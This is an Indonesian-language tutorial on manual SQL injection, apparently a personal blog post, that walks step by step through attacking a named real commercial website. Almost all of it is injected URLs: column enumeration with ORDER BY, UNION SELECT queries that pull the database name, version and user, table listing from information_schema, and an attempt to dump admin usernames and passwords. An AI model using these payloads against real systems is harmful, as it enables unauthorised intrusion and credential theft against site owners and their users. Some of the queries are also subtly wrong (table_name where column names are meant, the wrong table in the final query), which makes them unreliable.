SQL INJECTION

SQL injection manual
(http://en.wikipedia.org/wiki/SQL_injection).

target : http://www.jetonfireplace.com/ProductInfo.php?id=818
langkah-langkah melakukan sql injection manual yaitu :
1. kita tentukan terlebih dahulu bahwa website target terdapat error atau tidak, dengan cara menambahkan tanda petik (') pada ujung Url, seperti :
http://www.jetonfireplace.com/ProductInfo.php?id=818'

2. jika terdapat error, maka website tersebut bisa kita lakukan sql injeksi.
3. kita melakukan order by kolom yang terdapat pada website tersebut satu persatu hingga akhir kolom. seperti :
http://www.jetonfireplace.com/ProductInfo.php?id=-818 order by 1--
http://www.jetonfireplace.com/ProductInfo.php?id=-818 order by 2--
http://www.jetonfireplace.com/ProductInfo.php?id=-818 order by 3--


http://www.jetonfireplace.com/ProductInfo.php?id=-818 order by 4--
http://www.jetonfireplace.com/ProductInfo.php?id=-818 order by 5--
http://www.jetonfireplace.com/ProductInfo.php?id=-818 order by 6--
sampai dengan selesai hingga akhir kolom.
pada web tersebut terdapat akhir kolom yaitu kolom 19
http://www.jetonfireplace.com/ProductInfo.php?id=-818 order by 19--

untuk menandakan akhir kolom yaitu terdapat error pada kolom 20
http://www.jetonfireplace.com/ProductInfo.php?id=-818 order by 20--

maka akhir kolom web tersebut adalah 19.
4. kita harus mengetahui kolom yang berisi informasi-informasi penting web. dengan cara :
http://www.jetonfireplace.com/ProductInfo.php?id=-818 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--

kolom yang berisi informasi-informasi penting adalah kolom 4.
5. untuk mengetahui informasi nama database :
http://www.jetonfireplace.com/ProductInfo.php?id=-818 UNION SELECT 1,2,3,database(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--
pada kolom 4 diganti dengan database() untuk mengetahui nama database

6. untuk mengetahui informasi versi sql yang digunakan:
http://www.jetonfireplace.com/ProductInfo.php?id=-818 UNION SELECT 1,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--

7.  untuk mengetahui informasi user :
http://www.jetonfireplace.com/ProductInfo.php?id=-818 UNION SELECT 1,2,3,user(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--

8. setelah mengetahui informasi-informasi basic, langkah selanjutnya kita harus mengetahui informasi nama table pada kolom 4 database :
http://www.jetonfireplace.com/ProductInfo.php?id=-818 UNION SELECT 1,2,3,table_name,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 from+information_schema.tables+where+table_schema=database()--

9. kita melakukan group concat pada tabel nama diatas untuk melihat semua tabel-tabel pada kolom 4 yang ada :
http://www.jetonfireplace.com/ProductInfo.php?id=-818 UNION SELECT 1,2,3,group_concat(table_name),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 from+information_schema.tables+where+table_schema=database()--

10. kita juga harus melakukan group concat lagi pada tabel admin :
http://www.jetonfireplace.com/ProductInfo.php?id=-818 UNION SELECT 1,2,3,group_concat(table_name),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 from+information_schema.columns+where+table_name=0xHex--
konversi kan terlebih dahulu string 'ADMIN' kedalam Hexadesimal, :
http://www.jetonfireplace.com/ProductInfo.php?id=-818 UNION SELECT 1,2,3,group_concat(table_name),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 from+information_schema.columns+where+table_name=0x61646d696e --

11. terdapat informasi-informasi pada tabel admin :
yang kita perlukan hanya 'AdminName dan AdminPwd'
http://www.jetonfireplace.com/ProductInfo.php?id=-818 UNION SELECT 1,2,3,group_concat(0x3a,AdminName,0x3a,AdminPwd),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 from+users--
untuk saat ini percobaan saya gagal pada website diatas.
dalam waktu dekat akan ada perbaikan... :v